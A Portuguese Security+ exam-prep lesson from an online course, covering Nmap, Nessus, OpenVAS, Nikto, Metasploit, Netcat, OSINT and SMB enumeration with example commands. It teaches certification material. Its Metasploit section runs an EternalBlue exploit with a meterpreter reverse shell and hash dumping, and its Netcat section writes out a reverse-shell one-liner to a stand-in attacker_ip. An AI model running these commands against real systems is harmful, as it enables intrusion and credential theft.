Ferramentas comuns de verificação: Nessus, OpenVAS e Nmap
Adquira familiaridade prática com ferramentas padrão do setor para descoberta de hosts, verificação de portas e identificação de vulnerabilidades.
Ferramentas comuns de verificação: Nessus, OpenVAS e Nmap é uma aula grátis de Security+ Academy no CoddyKit. Esta é a aula 2 de 4. Você pode ler a aula completa abaixo gratuitamente — depois pratica ao vivo no navegador com um editor de código integrado e um tutor de IA 24/7. Faz parte do caminho de aprendizado de Security+ Academy, e seu progresso é sincronizado entre a web e o app CoddyKit. O curso de Security+ Academy inclui 4 aulas no total.
O Ecossistema de Ferramentas de Varredura
Os profissionais de Security usam diversas ferramentas de varredura para diferentes finalidades: descoberta de hosts, varredura de portas, enumeração de serviços, detecção do sistema operacional, identificação de vulnerabilidades e testes de aplicações web. O Security+ espera que você conheça as ferramentas mais usadas em cada categoria. Entender o que cada ferramenta faz — e o que ela não consegue fazer — ajuda você a selecionar a ferramenta certa para cada tarefa e interpretar os resultados corretamente. Os resultados de várias ferramentas complementares fornecem uma cobertura mais completa do que qualquer ferramenta isolada.
Nmap: o Mapeador de Redes
Nmap (Network Mapper) é a ferramenta de código aberto mais usada para descoberta de redes e auditoria de Security. Ela pode descobrir hosts ativos, enumerar portas abertas, detectar serviços em execução e suas versões e identificar o sistema operacional. O Nmap usa várias técnicas de varredura, incluindo a varredura SYN (o padrão, rápida e relativamente discreta), o TCP Connect (handshake completo, mais ruidoso, mas que não exige root), a varredura UDP e a varredura de versão. Ele vem com o Nmap Scripting Engine (NSE), que fornece centenas de scripts para detecção de vulnerabilidades, ataques de força bruta e exploração.
# Common Nmap scan types:
nmap -sS 192.168.1.0/24 # SYN scan (fast, stealthy)
nmap -sT 192.168.1.10 # TCP connect scan
nmap -sU -p 53,67,161 target # UDP scan specific ports
nmap -sV 192.168.1.10 # version detection
nmap -O 192.168.1.10 # OS detection
nmap -A 192.168.1.10 # aggressive: -sV -O -sC --traceroute
nmap -p- 192.168.1.10 # scan all 65535 ports
nmap --script vuln 192.168.1.10 # run vulnerability scriptsSaída e Interpretação do Nmap
Interpretar corretamente a saída do Nmap é uma habilidade essencial. Cada linha representa uma porta com seu estado (aberta: o serviço está escutando; fechada: o host respondeu, mas nada está escutando; filtrada: não houve resposta ou o ICMP está inacessível, provavelmente devido a um firewall), o protocolo e o serviço/versão detectado. Portas abertas representam uma possível superfície de ataque. Portas abertas inesperadas em um host podem indicar comprometimento ou serviços não autorizados. As opções -oN, -oX e -oG salvam a saída nos formatos normal, XML e analisável pelo grep — salvar a saída é fundamental para a documentação e a comparação entre varreduras ao longo do tempo.
# Sample Nmap output:
# PORT STATE SERVICE VERSION
# 22/tcp open ssh OpenSSH 8.2p1 Ubuntu
# 80/tcp open http Apache 2.4.41
# 443/tcp open ssl/http Apache 2.4.41
# 8080/tcp open http Jetty 9.4.39
# 3306/tcp open mysql MySQL 8.0.26
# 3306 open to internet = HIGH RISK (should be internal only)
# Save output:
nmap -sV 192.168.1.0/24 -oN scan_results.txt -oX scan_results.xmlNessus: Scanner Empresarial de Vulnerabilidades
Nessus (da Tenable) é o scanner comercial de vulnerabilidades mais amplamente implantado. Ele usa uma arquitetura de plugins com mais de 100.000 plugins que abrangem CVEs, verificações de configuração, referências de conformidade (CIS, DISA STIG) e detecção de malware. O Nessus realiza varreduras com Credentials fazendo login nos sistemas com as Credentials fornecidas para inspecionar versões de softwares instalados, chaves do registro e arquivos de configuração — produzindo resultados muito mais precisos do que a sondagem de rede sem Credentials. O Nessus produz relatórios detalhados com pontuações CVSS, descrições de vulnerabilidades e recomendações de correção. A versão gratuita Nessus Essentials faz a varredura de até 16 IPs.
# Nessus scan configuration key settings:
# Scan type: Advanced Scan (most control)
# Credentials: Windows (domain admin), SSH (root or sudo)
# Plugins: enable 'Safe Checks' to avoid crashing systems
# Schedule: define scan window (off-hours recommended)
# Nessus output rating:
# Critical (CVSS 9.0-10.0): remote code execution, critical data exposure
# High (CVSS 7.0-8.9): privilege escalation, severe data exposure
# Medium (CVSS 4.0-6.9): local privilege escalation, information disclosure
# Low (CVSS 0.1-3.9): minimal impact, hardening issues
# Info: configuration data, no immediate riskOpenVAS: Varredura de Vulnerabilidades de Código Aberto
OpenVAS (Open Vulnerability Assessment System) é um scanner de vulnerabilidades gratuito e de código aberto mantido pela Greenbone Networks. Ele é o fork mantido pela comunidade do Nessus original, antes de este se tornar comercial. O OpenVAS usa NVTs (Network Vulnerability Tests) análogos aos plugins do Nessus. A Greenbone Community Edition (GCE) fornece uma interface de gerenciamento baseada na web (Greenbone Security Assistant). O OpenVAS é popular em ambientes nos quais os custos de licenciamento impedem o uso de ferramentas comerciais. Ele possui um conjunto de recursos mais amplo que o Nmap e continua gratuito, sendo uma escolha comum para organizações menores, ambientes acadêmicos e laboratórios de Security.
# OpenVAS quick start:
# Install via Kali Linux or Docker:
gvm-setup # initial setup (takes time to download feeds)
gvm-start # start OpenVAS services
# Create a scan in the web UI (https://localhost:9392):
# 1. Create Target (host IPs, credentials)
# 2. Create Scan Config (Full and Fast, or Full Deep)
# 3. Create Task -> assign target + config
# 4. Start Task -> review Results report
# CLI scan:
openvas-cli --host=127.0.0.1 --user=admin --xml="<start_task>..."Nikto: Scanner de Vulnerabilidades de Servidores Web
Nikto é um scanner de servidores web de código aberto que verifica arquivos perigosos, versões desatualizadas de software, problemas de configuração do servidor e vulnerabilidades web comuns. Ele testa mais de 6.700 problemas conhecidos, incluindo métodos HTTP inseguros, cabeçalhos de Security ausentes, interfaces administrativas expostas, Credentials padrão e vulnerabilidades CGI comuns. O Nikto é ruidoso e não foi projetado para ser discreto — ele gera uma quantidade significativa de registros no alvo. Ele complementa os scanners de nível de rede ao fornecer verificações específicas para a web que o Nessus e o OpenVAS talvez não cubram em profundidade. Use sempre o Nikto somente em sistemas nos quais você tenha autorização para realizar testes.
# Nikto web scan examples:
nikto -h 192.168.1.10 # basic scan
nikto -h https://192.168.1.10 # HTTPS target
nikto -h 192.168.1.10 -p 8080,8443 # multiple ports
nikto -h 192.168.1.10 -o report.html -Format html # save report
# Nikto checks include:
# - Missing X-Frame-Options, Content-Security-Policy headers
# - Apache/nginx version disclosure
# - /admin, /phpinfo.php, /.git/ exposed
# - Default test files (phpMyAdmin, WebDAV)Metasploit Framework
O Metasploit Framework é a plataforma de testes de penetração mais usada, fornecendo um banco de dados de explorações, cargas úteis, módulos auxiliares e ferramentas pós-exploração. Os candidatos ao Security+ devem entender o que é o Metasploit e como ele se encaixa em um teste de penetração, mesmo que nunca o tenham usado. Os módulos do Metasploit incluem: explorações (código que tira proveito de uma vulnerabilidade), cargas úteis (shellcode executado após uma exploração bem-sucedida, como o Meterpreter), módulos auxiliares (varredura, fuzzing e enumeração sem exploração) e módulos pós-exploração (para escalação de privilégios, extração de Credentials e movimentação lateral após o acesso inicial).
# Metasploit Framework basic workflow:
msfconsole # start Metasploit
search eternalblue # search for exploit
use exploit/windows/smb/ms17_010_eternalblue
info # show exploit details
set RHOSTS 192.168.1.10 # target IP
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.5 # attacker IP
run # execute exploit
# After shell:
meterpreter> sysinfo
meterpreter> getuid
meterpreter> hashdump # dump NTLM hashesNetcat: o Canivete Suíço
Netcat (nc) é um utilitário simples, mas versátil, que lê e grava dados em conexões de rede usando TCP ou UDP. Ele tem inúmeras aplicações em atividades de Security: estabelecer shells reversos a partir de Hosts comprometidos, transferir arquivos entre segmentos de rede, realizar varredura de portas, criar ouvintes de rede simples para testes e capturar banners para identificar versões de serviços. Sua simplicidade e disponibilidade em praticamente todos os sistemas Linux fazem dele uma ferramenta frequentemente usada tanto na administração legítima quanto nos conjuntos de ferramentas de Attacker, tornando-o também uma ferramenta importante para compreender sob a perspectiva da detecção.
# Netcat usage examples:
# Banner grabbing:
nc -v 192.168.1.10 22 # grab SSH banner
nc -v 192.168.1.10 80 # grab HTTP banner
# Port scan:
nc -zv 192.168.1.10 1-1024 2>&1 | grep succeeded
# Reverse shell (attacker listens, victim connects out):
# Attacker: nc -lvnp 4444
# Victim: nc attacker_ip 4444 -e /bin/bash
# File transfer:
# Receiver: nc -lvnp 9999 > received_file.txt
# Sender: nc receiver_ip 9999 < file.txtFerramentas de Recon-ng e OSINT
Recon-ng é uma estrutura de reconhecimento na Web projetada para coletar OSINT (inteligência de fontes abertas). Ela usa módulos que consultam fontes públicas — Shodan, Bing, HaveIBeenPwned, registros de DNS, LinkedIn, WHOIS e logs de transparência de Certificate — para coletar informações sobre um Target antes do início de qualquer Scanning ativo. A fase de Reconnaissance de um teste de intrusão normalmente começa com OSINT para criar uma visão da topologia de rede do Target, dos nomes dos funcionários, dos formatos de e-mail, das tecnologias usadas e dos ativos expostos publicamente. Um bom OSINT pode revelar caminhos de ataque que demorariam muito mais para ser encontrados apenas por meio de Scanning ativo.
# OSINT tool chain for reconnaissance:
# 1. WHOIS: domain registration details
whois example.com
# 2. DNS enumeration:
dnsrecon -d example.com -t std
fiercer --domain example.com
# 3. Shodan: internet-facing device search
# shodan search 'org:"Target Corp" port:3389'
# 4. theHarvester: emails, subdomains, names
theharvester -d example.com -l 500 -b google,linkedin
# 5. Certificate transparency:
crt.sh/?q=%.example.com (reveals subdomains via certs)Enumeração de rede com Enum4linux
Enum4linux enumera informações de Hosts Windows e servidores Samba (SMB do Linux) usando sessões nulas e MSRPC. Ele extrai nomes de usuários, associações a grupos, compartilhamentos, políticas de senha e informações do grupo de trabalho. Durante testes de intrusão internos, enum4linux pode revelar rapidamente as contas de usuário disponíveis para pulverização de senhas e a estrutura de compartilhamentos de um ambiente. As versões modernas do Windows restringem o acesso por sessão nula por padrão, mas ambientes mal configurados frequentemente expõem uma quantidade significativa de informações. Recursos semelhantes estão disponíveis no samrdump.py do Impacket e no CrackMapExec para enumeração autenticada.
# Enum4linux Windows enumeration:
enum4linux -a 192.168.1.10 # all enumeration
enum4linux -U 192.168.1.10 # users only
enum4linux -S 192.168.1.10 # shares only
# CrackMapExec (authenticated enumeration):
crackmapexec smb 192.168.1.0/24 -u admin -p Password1
crackmapexec smb 192.168.1.10 --users
crackmapexec smb 192.168.1.10 --shares
# Nmap SMB scripts:
nmap --script smb-enum-users 192.168.1.10
nmap --script smb-os-discovery 192.168.1.10Como selecionar a ferramenta certa para cada tarefa
Profissionais de Security associam as ferramentas às tarefas. Para descoberta de Hosts e Scanning de portas: Nmap. Para identificação de Vulnerability em larga escala: Nessus (comercial) ou OpenVAS (gratuito). Para Vulnerability de servidores Web: Nikto. Para ataques a aplicações Web: Burp Suite. Para Exploitation: Metasploit. Para Reconnaissance de OSINT: Recon-ng, theHarvester, Shodan. Para análise de tráfego de rede: Wireshark, tcpdump. Para ataques sem fio: conjunto Aircrack-ng. O exame Security+ testa o conhecimento conceitual dessas ferramentas — você deve saber para que cada uma é usada, mesmo sem experiência prática com todas elas.
Verificação rápida
Teste sua compreensão dos conceitos do CompTIA Security+ (SY0-701) apresentados nesta lição.
Recapitulação da lição
Nesta lição, você aprendeu que o Nmap é a base para descoberta de Hosts, Scanning de portas e detecção de versões, com um mecanismo avançado de scripts para recursos adicionais; que o Nessus e o OpenVAS realizam Scanning abrangente de Vulnerability contra CVEs conhecidas, usando acesso com credenciais para obter a maior precisão; e que o Metasploit fornece uma estrutura de Exploitation para que profissionais de testes de intrusão confirmem se as Vulnerability são realmente exploráveis e demonstrem o Impacto real de um ataque. A seguir, exploraremos o ciclo de vida completo dos testes de intrusão, desde a Reconnaissance até o Reporting.
Perguntas Frequentes
A aula “Ferramentas comuns de verificação: Nessus, OpenVAS e Nmap” é grátis?
Sim — o texto completo de “Ferramentas comuns de verificação: Nessus, OpenVAS e Nmap” é grátis para ler aqui na web. Para praticá-la interativamente (um editor de código integrado e um tutor de IA 24/7) e desbloquear o restante do curso de Security+ Academy, atualize para CoddyKit PRO. O curso de Security+ Academy inclui 4 aulas no total.
O que vou aprender em “Ferramentas comuns de verificação: Nessus, OpenVAS e Nmap”?
Adquira familiaridade prática com ferramentas padrão do setor para descoberta de hosts, verificação de portas e identificação de vulnerabilidades. Você pratica Security+ Academy com código prático que executa diretamente no navegador, e um tutor de IA 24/7 responde suas dúvidas enquanto trabalha na aula.
Preciso ter experiência prévia para começar Security+ Academy?
Nenhuma experiência prévia é necessária. Security+ Academy no CoddyKit é estruturado para alunos iniciantes até avançados, então você pode começar aqui ou desde o início e aprender no seu ritmo. Esta é a aula 2 de 4.
Quanto tempo leva a aula “Ferramentas comuns de verificação: Nessus, OpenVAS e Nmap”?
A maioria das aulas CoddyKit leva cerca de 5–10 minutos. Cada uma é compacta e interativa, então você faz progresso constante e retoma exatamente de onde parou entre web e app.
Posso escrever e executar código nesta aula de Security+ Academy?
Sim. Cada aula de Security+ Academy inclui um editor de código integrado, então você escreve e executa código real direto no navegador e recebe feedback de IA instantaneamente — nenhuma configuração local necessária.
Todas as aulas deste curso
- Verificação de vulnerabilidades versus testes de intrusão
- Ferramentas comuns de verificação: Nessus, OpenVAS e Nmap
- Fases do teste de intrusão: do reconhecimento ao relatório
- Pontuação CVSS e priorização de vulnerabilidades